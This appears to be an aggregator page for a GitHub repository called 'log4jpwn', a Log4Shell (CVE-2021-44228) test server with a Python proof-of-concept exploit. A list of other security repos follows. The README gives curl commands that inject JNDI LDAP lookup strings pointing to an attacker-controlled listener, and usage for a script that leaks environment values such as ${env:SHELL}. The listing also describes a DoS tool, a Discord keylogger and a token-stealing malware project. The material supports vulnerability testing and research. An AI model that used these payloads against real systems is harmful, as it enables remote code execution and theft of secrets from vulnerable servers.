Log4j rce test environment and poc

Related tags

Security related resourceslog4jrcecve-2021-44228log4shell
Overview

log4jpwn

log4j rce test environment

See: https://www.lunasec.io/docs/blog/log4j-zero-day/

Experiments to trigger in various software products mentioned here can be found in the software/ directory.

using the included python poc

build

Either build the jar on your host with mvn clean compile assembly:single

Or use docker to build an image with docker build -t log4jpwn .

run

The server will log 3 things (which are also the triggers). You don't have to set all 3:

  • The User-Agent header content
  • The request path
  • The pwn query string parameter

To use:

  • Run the container with docker run --rm -p8080:8080 log4jpwn (or the jar if you built on your host with java -jar target/log4jpwn-1.0-SNAPSHOT-jar-with-dependencies.jar)
  • Make a curl request with a poisoned User-Agent header with your payload. eg curl -H 'User-Agent: ${jndi:ldap://172.16.182.1:8081/a}' localhost:8080, where 172.16.182.1 is where my netcat lister is running.

A complete example for all 3 bits that gets logged:

curl -v -H 'User-Agent: ${jndi:ldap://192.168.0.1:443/a}' 'localhost:8080/${jndi:ldap://192.168.0.1:443/a}/?pwn=$\{jndi:ldap://192.168.0.1:443/a\}'

run - exploit

The python exploit will leak values. By default it will try ${java:version}, but you can specify anything with the --leak flag.

Usage is:

❯ ./pwn.py --help
usage: pwn.py [-h] --target TARGET [--listen-host LISTEN_HOST] [--listen-port LISTEN_PORT] --exploit-host EXPLOIT_HOST [--leak LEAK]

a simple log4j <=2.14 information disclosure poc (ref: https://twitter.com/Black2Fan/status/1470281005038817284)

optional arguments:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        target uri
  --listen-host LISTEN_HOST
                        exploit server host to listen on (default: 127.0.0.1)
  --listen-port LISTEN_PORT, -lp LISTEN_PORT
                        exploit server port to listen on (default: 8888)
  --exploit-host EXPLOIT_HOST, -eh EXPLOIT_HOST
                        host where (this) exploit server is reachable
  --leak LEAK, -l LEAK  value to leak. see: https://twitter.com/Rayhan0x01/status/1469571563674505217 (default: ${java:version})

Example runs:

  • ./pwn.py --target http://localhost:8080 --exploit-host 127.0.0.1
  • ./pwn.py --target http://localhost:8080 --exploit-host 127.0.0.1 --leak '${env:SHELL}'
  • ./pwn.py --target http://localhost:8080 --exploit-host 127.0.0.1 --exploit-port 5555
Owner
Leon Jacobs
['Caffeine fueled', '(╯°□°)╯︵ ┻━┻', 'Security guy', 'Metalhead', 'I saw your password', 'KOOBo+KXleKAv+KXlSnjgaM=']
Leon Jacobs
GitHub Repository
Nmap automated port scanner written in Python

port-scanner Nmap automated port scanner written in Python. USE: Clone the module Import the module: from portscanModule import portscanner Use: ports

Brayden Karnes 1 Dec 03, 2021
DNSSEQ: PowerDNS with FALCON Signature Scheme

PowerDNS-based proof-of-concept implementation of DNSSEC using the post-quantum FALCON signature scheme.

Nils Wisiol 4 Feb 03, 2022
OSINT Cybersecurity Tools

OSINT Cybersecurity Tools Welcome to the World of OSINT: An ongoing collection of awesome tools and frameworks, best security software practices, libr

Paul Veillard, P. Eng 7 Jul 01, 2022
This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.

webapp-wordlists This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version co

Podalirius 396 Jan 08, 2023
A piece of software that shows a traceroute of a URL redirect path

Tracing URL redirects has never been easier! Usage • Download 🚩 Use Cases To see where an affiliate link ends up To see what affiliate network is bei

41 Nov 22, 2022
Internationalized Domain Names for Python (IDNA 2008 and UTS #46)

Internationalized Domain Names in Applications (IDNA) Support for the Internationalised Domain Names in Applications (IDNA) protocol as specified in R

Kim Davies 204 Dec 13, 2022
DoSer.py - Simple DoSer in Python

DoSer.py - Simple DoSer in Python What is DoSer? DoSer is basically an HTTP Denial of Service attack that affects threaded servers. It works like this

1 Oct 12, 2021
On-demand scanning for container registries

Lacework registry scanner Install & configure Lacework CLI Integrate a Container Registry Go to Lacework Resources Containers Container Image In

Will Robinson 1 Dec 14, 2021
Bug Alert: a service for alerting security and IT professionals of high-impact and 0day vulnerabilities

Bug Alert Bug Alert is a service for alerting security and IT professionals of h

BugAlert.org 208 Dec 15, 2022
The Linux defender anti-virus software ported to work on CentOS Linux.

By: Seanpm2001, Et; Al. Top README.md Read this article in a different language Sorted by: A-Z Sorting options unavailable ( af Afrikaans Afrikaans |

Sean P. Myrick V19.1.7.2 2 Sep 12, 2022
Discord-keylogger - Discord keylogger With Python

Discord-keylogger Usage python dlogger.py -t [Time interval in sec] if not speci

Satwik Sinha 1 Jan 30, 2022
Osint-Tool - Information collection tool in python

Osint-Tool Herramienta para la recolección de información Pronto más opciones In

3 Apr 09, 2022
EMBArk - The firmware security scanning environment

Embark is being developed to provide the firmware security analyzer emba as a containerized service and to ease accessibility to emba regardless of system and operating system.

emba 175 Dec 14, 2022
CVE-2021-44228 log4j 2.x rce漏洞检测工具

#1 使用说明 CVE-2021-44228 log4j 2.x rce漏洞检测工具,对目标链接发起get请求并利用dnslog探测是否有回显 $ python3 log4j-scan.py -h

CoCo ainrm- 4 Jan 13, 2022
A set of blender assets created for the $yb NFT project.

fyb-blender A set of blender assets created for the $yb NFT project. Install just as you would any other Blender Add-on (via Edit-Preferences-Add-on

Pedro Arroyo 1 May 06, 2022
A Radare2 based Python module for Binary Analysis and Reverse Engineering.

Zepu1chr3 A Radare2 based Python module for Binary Analysis and Reverse Engineering. Installation You can simply run this command. pip3 install zepu1c

Mehmet Ali KERİMOĞLU 5 Aug 25, 2022
Malware for Discord, designed to steal passwords, tokens, and inject discord folders for long-term use.

Vital What is Vital? Vital is malware primarily used to collect and extract information from the Discord desktop client. While it has other features (

HellSec 59 Dec 01, 2022
Signatures and IoCs from public Volexity blog posts.

threat-intel This repository contains IoCs related to Volexity public threat intelligence blog posts. They are organised by year, and within each year

Volexity 130 Dec 29, 2022
Send CVE information to the specified mailbox (from Github)

Send CVE information to the specified mailbox (from Github)

91 Nov 08, 2022
STATS305C: Applied Statistics III (Spring, 2022)

STATS305C: Applied Statistics III Instructor: Scott Linderman TA: Matt MacKay, James Yang Term: Spring 2022 Stanford University Course Description: Pr

Scott Linderman 14 Aug 11, 2022